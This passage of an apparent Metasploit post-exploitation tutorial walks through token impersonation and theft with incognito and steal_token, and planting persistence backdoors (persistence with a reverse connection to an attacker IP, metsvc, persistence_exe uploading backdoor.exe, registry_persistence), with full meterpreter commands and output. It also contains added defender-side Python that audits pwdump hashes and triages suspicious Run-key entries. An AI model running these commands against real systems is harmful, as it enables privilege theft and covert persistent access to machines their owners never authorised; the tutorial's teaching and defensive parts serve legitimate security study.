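LINE_RE = re.compile(r"^([^:]+):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):::$")


def parse_pwdump(text):
    """Parse pwdump-format lines; anything that does not match is skipped."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            rows.append({"user": m.group(1), "rid": int(m.group(2)),
                         "lm": m.group(3).lower(), "nt": m.group(4).lower()})
    return rows


def audit(rows):
    """Return the three findings a defender wants from a SAM dump:
    accounts with a blank password, accounts that still have an LM hash
    stored (crackable far faster than NT), and NT hashes shared by more
    than one account (the same password reused)."""
    findings = {"blank_password": [], "lm_hash_stored": [], "shared_nt_hash": {}}
    by_nt = {}
    for r in rows:
        if r["nt"] == EMPTY_NT:
            findings["blank_password"].append(r["user"])
        else:
            by_nt.setdefault(r["nt"], []).append(r["user"])
        if r["lm"] != EMPTY_LM:
            findings["lm_hash_stored"].append(r["user"])
    findings["shared_nt_hash"] = {h: u for h, u in by_nt.items() if len(u) > 1}
    return findings


if __name__ == "__main__":
    for key, value in audit(parse_pwdump(SAMPLE_DUMP)).items():
        print(f"{key}: {value}")
```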

(4) powerdump

Same as hashdump, but it failed

meterpreter > run powerdump
[*] PowerDump v0.1 - PowerDump to extract Username and Password Hashes...
[*] Running PowerDump to extract Username and Password Hashes...
[*] Uploaded PowerDump as 69921.ps1 to %TEMP%...
[*] Setting ExecutionPolicy to Unrestricted...
[*] Dumping the SAM database through PowerShell...
[-] Could not execute powerdump: Rex::Post::Meterpreter::RequestError core_channel_open: Operation failed: The system cannot find the file specified.

10. Token impersonation

When a user logs in to Windows, the system assigns the user a token; whenever the user accesses system resources, this token is used for authentication, much like a website's session or cookie.

msf provides a module that lets us impersonate someone else's token and switch identities. If the target is in a domain and a domain administrator happens to have logged in to a host we already control, we can take on the role of the domain administrator.

# 1. Impersonating tokens with incognito
use incognito      #help incognito for help
list_tokens -u    #list the available tokens
impersonate_token 'NT AUTHORITY\SYSTEM'  #impersonate the SYSTEM token
or: impersonate_token NT\ AUTHORITY\\SYSTEM  #without single quotes, \\ must be used
execute -f cmd.exe -i -t    # -t: run with the impersonated token
or simply run shell
rev2self   #return to the original token
# 2. Stealing tokens with steal_token
steal_token <pid>   #steal the token from the given process; run ps first
drop_token  #drop the stolen token

11. Planting backdoors

Meterpreter is just shellcode resident in memory; as soon as the target machine reboots, control is lost. Below is how to plant a backdoor to keep control.

(1) persistence: startup-item backdoor

Path: metasploit/scripts/meterpreter/persistence

It works by uploading a vbs script to C:\Users***\AppData\Local\Temp\ and adding a startup entry under the registry key HKLM\Software\Microsoft\Windows\CurrentVersion\Run\.

It is easily caught by AV, and the framework does not recommend it

run persistence -h  #show help
run persistence -X -i 5 -p 4444 -r 192.168.81.160
#-X start at boot, -i interval between reverse connections (5s), -r the attacker's IP
# Example
meterpreter > run persistence -X -i 5 -p 4444 -r 192.168.81.160
[!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe.
[!] Example: run post/windows/manage/persistence_exe OPTION=value [...]
[*] Running Persistence Script
[*] Resource file for cleanup created at /home/ubuntu/.msf4/logs/persistence/SAUCERMAN_20190612.4235/SAUCERMAN_20190612.4235.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.81.160 LPORT=4444
[*] Persistent agent script is 99630 bytes long
[+] Persistent Script written to C:\Users\TideSec\AppData\Local\Temp\qexwcMF.vbs
[*] Executing script C:\Users\TideSec\AppData\Local\Temp\qexwcMF.vbs
[+] Agent executed with PID 3540
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\qrsXZuPqVbEgua
[+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\qrsXZuPqVbEgua

A script with the same functionality is exploit/windows/local/persistence

(2) metsvc: service backdoor

Uploads a vbs script to C:\Users***\AppData\Local\Temp\ and adds a startup entry under HKLM\Software\Microsoft\Windows\CurrentVersion\Run\. **Started as a service, requires administrator privileges; not recommended by the framework; it failed to run**

run metsvc -A   #install the backdoor automatically
# Example
meterpreter > run metsvc -A
[!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe.
[!] Example: run post/windows/manage/persistence_exe OPTION=value [...]
[*] Creating a meterpreter service on port 31337
[*] Creating a temporary installation directory C:\Users\TideSec\AppData\Local\Temp\iInvhjKZbLH...
[*]  >> Uploading metsrv.x86.dll...
[*]  >> Uploading metsvc-server.exe...
[*]  >> Uploading metsvc.exe...
[*] Starting the service...
Cannot open service manager (0x00000005)
meterpreter > ls
Listing: C:\Users\TideSec\AppData\Local\Temp\iInvhjKZbLH
========================================================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
100666/rw-rw-rw-  178688  fil   2019-06-12 06:46:20 -0700  metsrv.dll
100777/rwxrwxrwx  45056   fil   2019-06-12 06:46:21 -0700  metsvc-server.exe
100777/rwxrwxrwx  61440   fil   2019-06-12 06:46:21 -0700  metsvc.exe

The three files were uploaded, but the service did not start, so it failed. The -r option removes the service.

(3) persistence_exe

Now let's look at what the framework recommends

meterpreter > info post/windows/manage/persistence_exe

       Name: Windows Manage Persistent EXE Payload Installer
     Module: post/windows/manage/persistence_exe
   Platform: Windows
       Arch:
       Rank: Normal

Provided by:
  Merlyn drforbin Cousins <drforbin6@gmail.com>

Compatible session types:
  Meterpreter

Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  REXENAME  default.exe      yes       The name to call exe on remote system
  REXEPATH                   yes       The remote executable to upload and execute.
  SESSION                    yes       The session to run this module on.
  STARTUP   USER             yes       Startup type for the persistent payload. (Accepted: USER, SYSTEM, SERVICE)

Description:
  This Module will upload an executable to a remote host and make it
  Persistent. It can be installed as USER, SYSTEM, or SERVICE. USER will
  start on user login, SYSTEM will start on system boot but requires
  privs. SERVICE will create a new service which will start the payload.
  Again requires privs.

Module options (post/windows/manage/persistence_exe):

  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  REXENAME  default.exe      yes       The name to call exe on remote system
  REXEPATH                   yes       The remote executable to upload and execute.
  SESSION                    yes       The session to run this module on.
  STARTUP   USER             yes       Startup type for the persistent payload. (Accepted: USER, SYSTEM, SERVICE)

This module uploads an executable to the remote host and makes it persistent. Four parameters are involved:

  • REXENAME is the name the file gets on the target system
  • REXEPATH is the local path of the backdoor to upload
  • SESSION selects the session to run the module in
  • STARTUP is the startup type and takes one of USER, SYSTEM or SERVICE: USER starts at user login, SYSTEM starts at system boot (requires privileges), SERVICE creates a service that starts it (requires privileges).

Let's try it:

meterpreter > run post/windows/manage/persistence_exe REXENAME=backdoor.exe REXEPATH=/home/ubuntu/shell.exe STARTUP=USER
[*] Running module against SAUCERMAN
[*] Reading Payload from file /home/ubuntu/shell.exe
[+] Persistent Script written to C:\Users\TideSec\AppData\Local\Temp\backdoor.exe
[*] Executing script C:\Users\TideSec\AppData\Local\Temp\backdoor.exe
[+] Agent executed with PID 3684
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\mEMZDQOxkkeebI
[+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\mEMZDQOxkkeebI
[*] Cleanup Meterpreter RC File: /home/ubuntu/.msf4/logs/persistence/SAUCERMAN_20190612.1023/SAUCERMAN_20190612.1023.rc

(4) registry_persistence

The full path is exploit/windows/local/registry_persistence

Similar to the first method, this module installs a payload into the registry's startup entries.

meterpreter > background
[*] Backgrounding session 13...
msf5 auxiliary(server/socks5) > use exploit/windows/local/registry_persistence
msf5 exploit(windows/local/registry_persistence) > show options

Module options (exploit/windows/local/registry_persistence):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   BLOB_REG_KEY                    no        The registry key to use for storing the payload blob. (Default: random)
   BLOB_REG_NAME                   no        The name to use for storing the payload blob. (Default: random)
   CREATE_RC      true             no        Create a resource file for cleanup
   RUN_NAME                        no        The name to use for the 'Run' key. (Default: random)
   SESSION                         yes       The session to run this module on.
   SLEEP_TIME     0                no        Amount of time to sleep (in seconds) before executing payload. (Default: 0)
   STARTUP        USER             yes       Startup type for the persistent payload. (Accepted: USER, SYSTEM)

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf5 exploit(windows/local/registry_persistence) > set SESSION 13
SESSION => 13
msf5 exploit(windows/local/registry_persistence) > run
[*] Generating payload blob..
[+] Generated payload, 6048 bytes
[*] Root path is HKCU
[*] Installing payload blob..
[+] Created registry key HKCU\Software\0BaG3zDR
[+] Installed payload blob to HKCU\Software\0BaG3zDR\iiEB4InD
[*] Installing run key
[+] Installed run key HKCU\Software\Microsoft\Windows\CurrentVersion\Run\SMPqA5kB
[*] Clean up Meterpreter RC file: /home/ubuntu/.msf4/logs/persistence/192.168.81.154_20190612.2138/192.168.81.154_20190612.2138.rc

Other payloads of the same kind include exploit/windows/local/vss_persistence and exploit/windows/local/s4u_persistence
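Every method in this section, and the persistence script in Part I, leaves a value under a Run key that points at something in the user's Temp directory, usually under a random value name. The following is an added example, not code from the original post, written from the defender's side: it parses saved reg query output for a Run key and flags entries with those traits. The sample output and its command strings are constructed for this example, and the random-name check is a heuristic.

```python
import re

# Constructed sample of `reg query HKCU\...\Run` output. The two odd
# entries imitate what the persistence script and persistence_exe leave
# behind (random value name, payload under the user's Temp directory);
# the command strings themselves are made up for this example.
SAMPLE_REG_QUERY = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive          REG_SZ    "C:\Users\TideSec\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    qrsXZuPqVbEgua    REG_SZ    wscript.exe //B "C:\Users\TideSec\AppData\Local\Temp\qexwcMF.vbs"
    mEMZDQOxkkeebI    REG_SZ    C:\Users\TideSec\AppData\Local\Temp\backdoor.exe
    Steam             REG_SZ    "C:\Program Files (x86)\Steam\steam.exe" -silent
"""

# One value line: indented name, REG_* type, data (value names containing
# spaces are not handled by this simple pattern).
ENTRY_RE = re.compile(r"^\s+(?P<name>\S+)\s+(?P<type>REG_\w+)\s+(?P<data>.+?)\s*$")
TEMP_PATH_RE = re.compile(r"\\(Temp|Local Settings\\Temp|AppData\\Local\\Temp)\\", re.I)
SCRIPT_HOST_RE = re.compile(r"\b(wscript|cscript|mshta|powershell|rundll32|regsvr32)(\.exe)?\b", re.I)
SCRIPT_EXT_RE = re.compile(r"\.(vbs|js|jse|wsf|hta|ps1|bat|cmd)\b", re.I)


def looks_random(name):
    """Heuristic for the auto-generated names these scripts use: 8+ letters
    or digits with few vowels and several upper/lower case switches."""
    if not re.fullmatch(r"[A-Za-z0-9]{8,}", name):
        return False
    vowels = sum(c.lower() in "aeiou" for c in name)
    switches = sum(a.isupper() != b.isupper() for a, b in zip(name, name[1:]))
    return vowels / len(name) < 0.4 and switches >= 3


def parse_run_entries(text):
    """Return [{'name', 'type', 'data'}] for every value line in reg query output."""
    return [m.groupdict() for m in map(ENTRY_RE.match, text.splitlines()) if m]


def triage(entries):
    """Return [(name, data, reasons)] for entries that deserve a closer look."""
    flagged = []
    for e in entries:
        reasons = []
        if TEMP_PATH_RE.search(e["data"]):
            reasons.append("payload lives under a Temp directory")
        if SCRIPT_HOST_RE.search(e["data"]) or SCRIPT_EXT_RE.search(e["data"]):
            reasons.append("script host or script file as autorun target")
        if looks_random(e["name"]):
            reasons.append("random-looking value name")
        if reasons:
            flagged.append((e["name"], e["data"], reasons))
    return flagged


if __name__ == "__main__":
    for name, data, reasons in triage(parse_run_entries(SAMPLE_REG_QUERY)):
        print(f"{name}: {data}\n    " + "; ".join(reasons))
```

The same checks apply to the HKLM Run key the persistence script writes when run with -X, and to the value names shown in the outputs above.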

Conclusion

Notes on some ways of using MSF.
